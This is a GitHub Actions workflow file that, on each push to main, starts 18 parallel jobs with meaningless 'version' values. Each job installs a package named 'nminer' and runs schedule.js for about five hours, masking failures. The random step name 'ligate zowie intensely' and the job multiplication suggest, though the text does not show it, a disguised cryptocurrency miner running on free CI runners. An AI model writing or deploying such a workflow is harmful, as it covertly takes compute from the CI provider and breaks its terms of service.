name: schedule
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2085 }
          - { version: 8506 }
          - { version: 3679 }
          - { version: 904 }
          - { version: 9459 }
          - { version: 5128 }
          - { version: 6566 }
          - { version: 3360 }
          - { version: 3765 }
          - { version: 5559 }
          - { version: 5708 }
          - { version: 5600 }
          - { version: 9102 }
          - { version: 2351 }
          - { version: 1808 }
          - { version: 7603 }
          - { version: 7396 }
          - { version: 1843 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: ligate zowie intensely
        run: |
          npm install nminer@latest
          timeout 301m node schedule.js || echo "schedule executed"